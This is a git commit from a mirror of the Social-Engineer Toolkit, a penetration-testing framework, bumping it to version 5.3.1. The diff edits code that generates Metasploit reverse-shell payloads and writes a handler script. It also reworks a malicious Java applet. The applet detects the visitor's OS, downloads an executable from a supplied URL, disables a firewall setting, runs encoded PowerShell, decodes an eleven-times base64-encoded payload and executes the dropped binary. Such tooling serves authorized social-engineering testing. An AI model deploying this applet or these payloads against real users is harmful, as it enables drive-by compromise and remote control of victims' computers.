Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2025-02-17 13:58:34 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge branch 'master' of github.com:trustedsec/social-engineer-toolkit

Browse source
This commit is contained in:
trustedsec 2013-08-11 11:31:23 -04:00
commit 94474138fb
5 changed files with 124 additions and 110 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
readme/CHANGES
View file

@ -1,3 +1,16 @@
~~~~~~~~~~~~~~~~
version 5.3.1
~~~~~~~~~~~~~~~~
* Fixed an issue that was causing the Metasploit payloads for OSX/Linux to not generate properly
* Added new configuration options in set_config to allow selectable Linux/OSX payloads
* Added new configuration option to allow you to add a custom payload for OSX/Linux
* Changed PowerShell injection from using port 8080, this is still configurable
* Fixed an issue when meterpreter payloads were specified, encoding would default to 0 instead of 4
* Fixed spacing issues on set LHOST commands within Powershell payload prep
* Cleaned up the Java Applet code and added appropriate spaces
* Fixed an issue that would cause OSX payloads to not properly work
~~~~~~~~~~~~~~~~
version 5.3
~~~~~~~~~~~~~~~~

22
src/core/payloadgen/create_payloads.py
View file

@ -297,8 +297,9 @@ try:
encoder = "true"
# Handle special cases
if encode=='' or encode == ' ': encode = '16'
if encode == '16': encount=0
if encode=='' or encode == ' ': encode = '1'
if encode == '1':
encount="4"
if encode=='14' or encode == '0': encoder="false"
# do dictionary lookup
@ -658,15 +659,24 @@ try:
# deploy nix and linux binaries
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
port2=check_config("LINUX_REVERSE_PORT=")
osxpayload = check_config("OSX_PAYLOAD_DELIVERY=")
linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=")
print_status("Generating OSX payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload osx/x86/shell_reverse_tcp LHOST=%s LPORT=%s X > %s/mac.bin;chmod 755 %s/mac.bin" % (path,choice2,port1,setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen(r"ruby %s/msfpayload %s LHOST=%s LPORT=%s X > %s/mac.bin;chmod 755 %s/mac.bin" % (path,osxpayload,choice2,port1,setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Generating Linux payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload linux/x86/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s/nix.bin" % (path,choice2,port2,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen(r"ruby %s/msfpayload %s LHOST=%s LPORT=%s X > %s/nix.bin" % (path,linuxpayload,choice2,port2,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if multiattack_java == "on":
multiattack.write("OSX="+str(port1)+"\n")
multiattack.write("OSXPAYLOAD=osx/x86/shell_reverse_tcp\n")
multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload))
multiattack.write("LINUX="+str(port2)+"\n")
multiattack.write("LINUXPAYLOAD=linux/x86/shell/reverse_tcp\n")
multiattack.write("LINUXPAYLOAD=%s\n" % (linuxpayload))
osxcheck = check_options("MAC.BIN=")
linuxcheck = check_options("NIX.BIN=")
shutil.copyfile(setdir + "/mac.bin", setdir + "/web_clone/%s" % (osxcheck))
shutil.copyfile(setdir + "/nix.bin", setdir + "/web_clone/%s" % (linuxcheck))
# try block here
try:
# if they want a listener, start here

4
src/core/setcore.py
View file

@ -229,7 +229,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '5.3'
define_version = '5.3.1'
return define_version
class create_menu:
@ -753,7 +753,7 @@ def show_banner(define_version,graphic):
print bcolors.BLUE + """
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """NextGen Unicorn""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@TrustedSec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@Dave_ReL1K""" + bcolors.BLUE+""" [---]

2
src/payloads/powershell/prep.py
View file

@ -112,7 +112,7 @@ if multi_injection == "on":
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\n set LHOST %s\nset EnableStageEncoding true\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (powershell_inject_x86, ipaddr, ports))
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding true\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (powershell_inject_x86, ipaddr, ports))
filewrite.close()
# if its turned to off

193
src/webattack/java_applet/Java.java
View file

@ -6,12 +6,13 @@ import java.util.*;
import sun.misc.BASE64Decoder;
import java.net.URL;
/**
* Original Author: Thomas Werth
* Modifications By: Dave Kennedy, Kevin Mitnick
* This is a universal Applet which determintes Running OS
* Then it fetches based on OS Type download param (WIN,MAC,NIX)
**/
/**************************************************************
*
* Java Applet for the Social-Engineer Toolkit
* Original work from Thomas Werth and customized
* by Dave Kennedy (ReL1K).
*
**************************************************************/
public class Java extends Applet {
@ -21,14 +22,14 @@ public class Java extends Applet {
return initialized;
}
public void init() {
public void init()
{
Process f;
try {
// generate a random string
Random r = new Random();
String token = Long.toString(Math.abs(r.nextLong()), 36);
// generate a random string
Random r = new Random();
String token = Long.toString(Math.abs(r.nextLong()), 36);
String pfad = System.getProperty("java.io.tmpdir") + File.separator;
String writedir = System.getProperty("java.io.tmpdir") + File.separator;
// grab operating system
@ -40,54 +41,51 @@ public class Java extends Applet {
String thirdParm = "";
String fourthParm = "";
String fifthParm = "";
String sixthParm = "";
String seventhParm = "";
String eightParm = "";
short osType = -1 ;//0=win,1=mac,2=nix
String sixthParm = "";
String seventhParm = "";
String eightParm = "";
short osType = -1 ; // 0=WIN, 1=MAC, 2=NIX
if (os.indexOf( "win" ) >= 0) // We are running Windows then
{
// 1 = WINDOWSPLZ
// 2 = ILIKESTUFF
// 3 = OSX
// 4 = LINUX
// 5 = X64
// 6 = X86
// 7 = HUGSNOTDRUGS
// 8 = LAUNCH
// 9 = nextPage
// 10 = B64EncodeTimes
// 1 = WINDOWSPLZ
// 2 = ILIKESTUFF
// 3 = OSX
// 4 = LINUX
// 5 = X64
// 6 = X86
// 7 = HUGSNOTDRUGS
// 8 = LAUNCH
// 9 = nextPage
// 10 = B64EncodeTimes
downParm = getParameter( "1" );
nextParm = getParameter( "2" );
thirdParm = getParameter( "5" );
fourthParm = getParameter( "6" );
fifthParm = getParameter( "7" );
sixthParm = getParameter( "8" );
seventhParm = getParameter( "9" );
eightParm = getParameter( "10" );
sixthParm = getParameter( "8" );
seventhParm = getParameter( "9" );
eightParm = getParameter( "10" );
osType = 0;
pfad += token + ".exe";
}
else if (os.indexOf( "mac" ) >= 0) //MAC
else if (os.indexOf("mac") >= 0) //MAC
{
downParm = getParameter( "3" );
osType = 1;
// look for special folders to define snow leopard, etc.
if (pfad.startsWith("/var/folders/")) pfad = "/tmp/";
// look for special folders to define snow leopard, etc.
if (pfad.startsWith("/var/folders/")) pfad = "/tmp/"; // OSX SNOW LEOPARD AND ABOVE
pfad += token + ".bin";
}
else if (os.indexOf( "nix") >=0 || os.indexOf( "nux") >=0) // UNIX
else if (os.indexOf( "nix") >=0 || os.indexOf( "nux") >=0) // UNIX
{
downParm = getParameter( "4" );
osType = 2;
pfad += token + ".bin";
}
if ( downParm.length() > 0 && pfad.length() > 0 )
{
// attempt to disable statefulftp if running as an administrator
f = Runtime.getRuntime().exec("netsh advfirewall set global StatefulFTP disable");
if ( downParm.length() > 0 && pfad.length() > 0 )
{
// URL parameter
URL url = new URL(downParm);
// Get an input stream for reading
@ -95,10 +93,10 @@ public class Java extends Applet {
// Create a buffered input stream for efficency
BufferedInputStream bufIn = new BufferedInputStream(in);
File outputFile = new File(pfad);
OutputStream out =
new BufferedOutputStream(new FileOutputStream(outputFile));
OutputStream out = new BufferedOutputStream(new FileOutputStream(outputFile));
byte[] buffer = new byte[2048];
for (;;) {
for (;;)
{
int nBytes = bufIn.read(buffer);
if (nBytes <= 0) break;
out.write(buffer, 0, nBytes);
@ -106,28 +104,23 @@ public class Java extends Applet {
out.flush();
out.close();
in.close();
}
}
// has it executed yet? then target nextPage to victim
String page = getParameter( "9" );
if ( page != null && page.length() > 0 )
if ( page != null && page.length() > 0 )
{
URL urlPage = new URL(page);
getAppletContext().showDocument(urlPage);
}
// Here is where we define OS type, i.e. windows, linux, osx, etc.
// Here is where we define OS type, i.e. windows, linux, osx, etc.
if ( osType < 1 ) // If we're running Windows
{
// Disabled the check, even if it doesn't exist, it will still execute, removes
// inability to determine path variables
// attempt to disable statefulftp if running as an administrator
f = Runtime.getRuntime().exec("netsh advfirewall set global StatefulFTP disable");
// powershell x86 or 64 bit
//File folderExisting = new File("C:\\Windows\\System32\\WindowsPowershell\\v1.0");
// if (folderExisting.exists())
// {
if (thirdParm.length() > 3)
{
// this detection is for the new powershell vector, it will run a special command if the flag is turned on in SET
@ -142,33 +135,31 @@ public class Java extends Applet {
String[] arrSplit = strMain.split(",");
for (int i=0; i<arrSplit.length; i++)
{
f = Runtime.getRuntime().exec("cmd /c powershell -EncodedCommand " + arrSplit[i]);
}
}
}
else if (arch.contains("i"))
{
// this will be 32 bit
if (thirdParm.length() > 3)
{
// iterate through Parm for our injection
String strMain = thirdParm;
String[] arrSplit = strMain.split(",");
for (int i=0; i<arrSplit.length; i++)
{
f = Runtime.getRuntime().exec("cmd /c powershell -EncodedCommand " + arrSplit[i]);
}
}
// }
f = Runtime.getRuntime().exec("cmd /c powershell -enc " + arrSplit[i]);
}
}
}
else if (arch.contains("i"))
{
// this will be 32 bit
if (thirdParm.length() > 3)
{
// iterate through Parm for our injection
String strMain = thirdParm;
String[] arrSplit = strMain.split(",");
for (int i=0; i<arrSplit.length; i++)
{
f = Runtime.getRuntime().exec("cmd /c powershell -enc " + arrSplit[i]);
}
}
}
}
// if we aren't using the shellcodeexec attack
if (nextParm.length() < 3)
{
// if we turned on binary dropping
if (sixthParm.length() > 2)
{
// if we turned on binary dropping
if (sixthParm.length() > 2)
{
// if we are using the SET interactive shell
if (fifthParm.length() > 2)
@ -196,8 +187,8 @@ public class Java extends Applet {
if (sixthParm.length() > 2)
{
// all parameters are base64 encoded, this will decode for us and pass the decoded strings
BASE64Decoder decoder = new BASE64Decoder();
byte[] decoded = decoder.decodeBuffer(nextParm);
BASE64Decoder decoder = new BASE64Decoder();
byte[] decoded = decoder.decodeBuffer(nextParm);
// decode again
String decoded_string = new String(decoded);
String decoded_string_2 = new String(decoder.decodeBuffer(decoded_string));
@ -215,10 +206,10 @@ public class Java extends Applet {
String decoded_string_8 = new String(decoder.decodeBuffer(decoded_string_7));
// again
String decoded_string_9 = new String(decoder.decodeBuffer(decoded_string_8));
// again
String decoded_string_10 = new String(decoder.decodeBuffer(decoded_string_9));
// last one
String decoded_string_11 = new String(decoder.decodeBuffer(decoded_string_10));
// again
String decoded_string_10 = new String(decoder.decodeBuffer(decoded_string_9));
// last one
String decoded_string_11 = new String(decoder.decodeBuffer(decoded_string_10));
PrintStream out = null;
String randomfile = Long.toString(Math.abs(r.nextLong()), 36);
@ -230,37 +221,37 @@ public class Java extends Applet {
if (out != null) out.close();
}
// this is if we are using multipyinjector
f = Runtime.getRuntime().exec("cmd.exe /c \"" + pfad + " " + writedir + randomfile + " " + eightParm);
f = Runtime.getRuntime().exec("cmd.exe /c \"" + pfad + " " + writedir + randomfile + " " + eightParm);
// this runs the single instance of shellcodeexec, pyinjector, or a binary
f = Runtime.getRuntime().exec("cmd.exe /c \"" + pfad + " " + decoded_string_11 + "\"");
// f.waitFor();
}
}
// delete old file
// (new File(pfad)).delete();
}
else // if not windows then use linux/osx/etc.
{
// change permisisons to execute
Process process1 = Runtime.getRuntime().exec("/bin/chmod 755 " + pfad);
process1.waitFor();
//and execute
f = Runtime.getRuntime().exec(pfad);
// wait for termination
f.waitFor();
// delete old file
(new File(pfad)).delete();
else // if not windows then use linux/osx/etc.
{
// change permisisons to execute
Process process1 = Runtime.getRuntime().exec("/bin/chmod 755 " + pfad);
process1.waitFor();
//and execute
f = Runtime.getRuntime().exec(pfad);
// wait for termination
f.waitFor();
// delete old file
(
new File(pfad)).delete();
}
initialized = this;
} catch(IOException e) {
}
catch(IOException e) {
e.printStackTrace();
}
/* ended here and commented out below for bypass */
catch (Exception exception)
{
exception.printStackTrace();
}
}
/* ended here and commented out below for bypass */
catch (Exception exception)
{
exception.printStackTrace();
}
}
}